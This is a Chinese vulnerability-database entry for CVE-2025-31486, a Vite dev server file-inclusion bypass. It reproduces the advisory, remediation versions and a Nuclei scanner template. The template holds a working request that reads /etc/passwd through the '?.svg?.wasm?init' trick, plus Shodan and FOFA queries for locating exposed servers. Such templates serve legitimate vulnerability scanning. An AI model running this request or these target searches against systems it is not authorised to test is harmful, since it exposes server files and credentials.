CVE-2025-31486: Vite server.fs.deny Bypass - Local File Inclusion

日期: 2025-11-11 | 影响软件: Vite | POC: 已公开

漏洞描述

Vite is a frontend tooling framework for javascript. The contents of arbitrary files can be returned to the browser. By adding ?.svg with ?.wasm?init or with sec-fetch-dest- script header, the server.fs.deny restriction was able to bypass. This bypass is only possible if the file is smaller than build.assetsInlineLimit (default- 4kB) and when using Vite 6.0+. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

PoC代码[已公开]

id: CVE-2025-31486

info:
  name: Vite server.fs.deny Bypass - Local File Inclusion
  author: wn147
  severity: medium
  description: |
    Vite is a frontend tooling framework for javascript. The contents of arbitrary files can be returned to the browser. By adding ?.svg with ?.wasm?init or with sec-fetch-dest- script header, the server.fs.deny restriction was able to bypass. This bypass is only possible if the file is smaller than build.assetsInlineLimit (default- 4kB) and when using Vite 6.0+. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
  remediation: |
    Update Vite to version 4.5.12, 5.4.17, 6.0.14, 6.1.4, 6.2.5 or later.
  reference:
    - https://github.com/advisories/GHSA-xcj6-pq6g-qj4x
    - https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290
    - https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647
    - https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31486
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-31486
    cwe-id: CWE-200
    epss-score: 0.0348
    epss-percentile: 0.87075
  metadata:
    verified: true
    max-requests: 1
    shodan-query: title:"Vite App"
    fofa-query: title="Vite App"
  tags: cve,cve2025,vite,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/etc/passwd?.svg?.wasm?init"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "import initWasm"
          - "sourceMappingURL="
        condition: and

      - type: word
        part: body
        words:
          - "/@fs/etc/passwd?.svg"
        negative: true

      - type: word
        part: content_type
        words:
          - "text/javascript"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ae473b50ef3a8e364031af7753f0a931210f13757a399e20b841062185aeb4f5022100d668370fe705adf24b49b098257fae90a13d07b3ace0aaa155bd301592c3df3f:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-31486.yaml

相关漏洞推荐